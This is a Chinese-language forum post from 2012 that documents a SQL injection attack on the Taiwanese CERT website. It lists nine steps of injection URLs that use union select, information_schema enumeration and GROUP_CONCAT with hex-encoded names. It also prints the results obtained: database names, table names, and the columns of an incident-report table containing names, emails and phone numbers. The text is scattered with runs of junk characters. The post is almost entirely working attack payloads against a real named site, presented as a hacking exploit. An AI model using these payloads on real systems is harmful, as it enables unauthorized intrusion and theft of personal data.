1.判断版本http://www.cert.org.tw/document/advisory/detail.php?id=7 and ord(mid(version(),1,1))>51 返回正常,说明大于4.0版本,支持ounion查询
" D5 Z; V8 [; [9 X$ N* K2.猜解字段数目,用order by也可以猜,也可以用union select一个一个的猜解 L& q" B6 k. L4 a/ B
http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,2,3,4,5,6,7,8,9--& Q. b" r7 j3 _+ {9 P
3.查看数据库版本及当前用户,http://www.cert.org.tw/document/advisory/detail.php?id=7 and 2=4 union select 1,user(),version(),4,5,6,7,8,9--
, Z9 }7 i- \+ `+ W4 f数据库版本5.1.35,据说mysql4.1以上版本支持concat函数,我也不知道是真是假,有待牛人去考证。
- W9 O- B4 [3 p; o$ F* ?) S6 C4.判断有没有写权限
+ e( K0 a! Z3 ]: Ehttp://www.cert.org.tw/document/advisory/detail.php?id=7 and (select count(*) from MySQL.user)>0-- 返回错误,没有写权限
% t& f$ `" L! I2 T ?; P没办法,手动猜表啦# C: a4 e1 p4 @9 W" ^4 [
5.查库,以前用union select 1,2,3,SCHEMA_NAME,5,6,n from information_schema.SCHEMATA limit 0,16 |+ t# n. r( z' j+ o
但是这个点有点不争气,用不了这个命令,就学习了下土耳其黑客的手法,不多说,如下
9 S {2 ] x u: a( z' Q! Yhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_schema),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns--5 R7 \/ Y! ]' u
成功查出所有数据库,国外的黑客就是不一般。数据库如下:7 g0 Q8 T8 D. b* ?; J- a s
information_schema,Advisory,IR,mad,member,mysql,twcert,vuldb,vulscandb8 [$ `5 c; S8 M% N% Z
6.爆表,爆的是twcert库% H: i5 R2 [ H0 H- {! O. Y7 b
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+table_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_schema=0x747763657274--; p; ?0 \3 O9 j5 ~% \7 h
爆出如下表
! H9 @( K4 ]5 r: j) K4 jdownloadfile,irsys,newsdata,secrpt,secrpt_big5
$ h% D! b& g/ G7.爆列名,这次爆的是irsys表0 W1 M; l: Q8 L! M* p1 C$ u% O* c
http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,GROUP_CONCAT(DISTINCT+column_name),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+information_schema.columns+where+table_name=0x6972737973--
, ^! Y/ J" v, T- B% X" e, V爆出如下列
, y7 l( ~- Z/ Y6 t, Air_id,name,company,email,tel,pubdate,rptdep,eventtype,eventdesc,machineinfo,procflow,memo,filename,systype,status) b+ }/ o n4 j* @' P# e7 i
8.查询字段数,到这一步,国内很少有黑客去查询字段数的,直接用limit N,1去查询,直接N到报错为止。
" Y }2 E0 E: Y2 b7 W# }3 h3 Q2 \http://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,CONCAT(count(*)),0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys--, x! S2 ^+ p# c: A# i
返回是3,说明每个列里有3个地段. W* `$ M/ @, J% D0 A2 B
9.爆字段内容
9 i( y) n7 G. s( T1 Shttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+0,1--
1 U" i. U; H3 x5 ~8 Q* F爆出name列的第一个字段的内容
9 [1 |" i* n6 E* k) D) q* Hhttp://www.cert.org.tw/document/ ... union+select+concat(0x5B78786F6F5D,name,0x5B78786F6F5D),-3,-3,-3,-3,-3,-3,-3,-3+from+twcert.irsys+LIMIT+1,1--
( e- ]: p3 e8 E- S7 }+ {+ G爆出name列的第二个字段的内容 |
发表于 2012-9-13 17:57:04
收藏
支持
反对